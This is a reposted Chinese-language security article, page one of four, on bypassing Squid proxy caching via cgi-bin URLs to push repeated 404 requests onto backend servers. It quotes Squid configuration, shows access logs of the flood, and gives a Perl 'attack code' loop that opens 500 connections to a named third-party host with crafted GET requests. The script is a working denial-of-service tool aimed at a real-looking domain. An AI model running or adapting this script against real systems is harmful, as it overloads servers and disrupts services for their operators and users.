首 页 | 模 板 | 学 院 | 源 码 | 书 籍 | 壁 纸 | 字 体 | JS脚本 | FLASH源码 | 软 件 | 矢 量 | 服务器软件 | 素 材 | 其 它 |
设为主页
加入收藏
联系站长
平面设计 | 网页制作 | 程序编写 | 数 据 库 | 媒体动画 | 网络冲浪 | 服务器相关 | 站长乐园 | 业界动态 |
当前在线
利用HTTP指令进行攻击之Cache篇
2006-12-6 15:44:24  作者:模板天下收集整理  来源:未知 网友评论 0 条 论坛
  

从Squid的配置文件里可以看到,Squid对于特殊错误的返回也是做了处理的,一样做了Cache。 

#  TAG: negative_ttl    time-units
#       Time-to-Live (TTL) for failed requests.  Certain types of
#       failures (such as "connection refused" and "404 Not Found") are
#       negatively-cached for a configurable amount of time.  The
#       default is 5 minutes.  Note that this is different from
#       negative caching of DNS lookups.

是否有方式可以绕过cache机制和ACL限制,将类似404压力施加到服务器上?答案时肯定的,那就是通过访问cgi-bin目录下的文件。

通过执行攻击代码我们同样实现了对后台主机的攻击,穿透了Cache。 

root@coolc:~/squid-2.5.STABLE12# cat squid_access.log  awk '{print $4'} uniq -c
499 TCP_MISS/404

root@coolc:~/squid-2.5.STABLE12# cat apache-access_log  wc -l
499

从日志中可以发现如下痕迹。 

172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298

实际上造成上述原因就死活因为默认配置中对于cgi-bin目录做了特殊处理,导致对于其放开了Cache的限制。 

#  TAG: hierarchy_stoplist
#       A list of words which, if found in a URL, cause the object to
#       be handled directly by this cache.  In other words, use this
#       to not query neighbor caches for certain objects.  You may
#       list this option multiple times. Note: never_direct overrides
#       this option.
#We recommend you to use at least the following line.
hierarchy_stoplist cgi-bin ?
#  TAG: no_cache
#       A list of ACL elements which, if matched, cause the request to
#       not be satisfied from the cache and the reply to not be cached.
#       In other words, use this to force certain objects to never be cached.
#
#       You must use the word 'DENY' to indicate the ACL names which should
#       NOT be cached.
#
#We recommend you to use the following two lines.
acl QUERY urlpath_regex cgi-bin \?
no_cache deny QUERY

攻击代码: 

use IO::Socket;
#$host=shift(@ARGV);
$i=1;
while ($i<500) {
    $i++;
    print "\n$i\n";
    $remote = IO::Socket::INET->new(Proto => "tcp",
    PeerPort => "80",
    #PeerAddr => "blog.xfocus.net"
    PeerAddr => "test.qq.com"
    )  die(print "cant't connet $!");
    $remote->autoflush(1);
    print  $remote "GET /cgi-bin/index.html1 HTTP/1.1\r\nAccept:image/gif image/x-
xbitmap, image/jpeg,application/x-shockwave-flash\r\nReferer: 
http://www.google.com\r\nAccept:-Language: zh-cn\r\nUser-Agent: Mozilla/4.0 (compatible; 
MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
\r\nHOST:test.qq.com\n\n";
  #print <$remote>;
  close $remote;
  #sleep 1;
    }

共分4页  [1] [2] [3] [4] 

>> 相关文章

关于网站 | 客服中心 | 服务条款 | 友情链接 | 广告联系 | 本站历程 | 网站导航

吉ICP备05000107号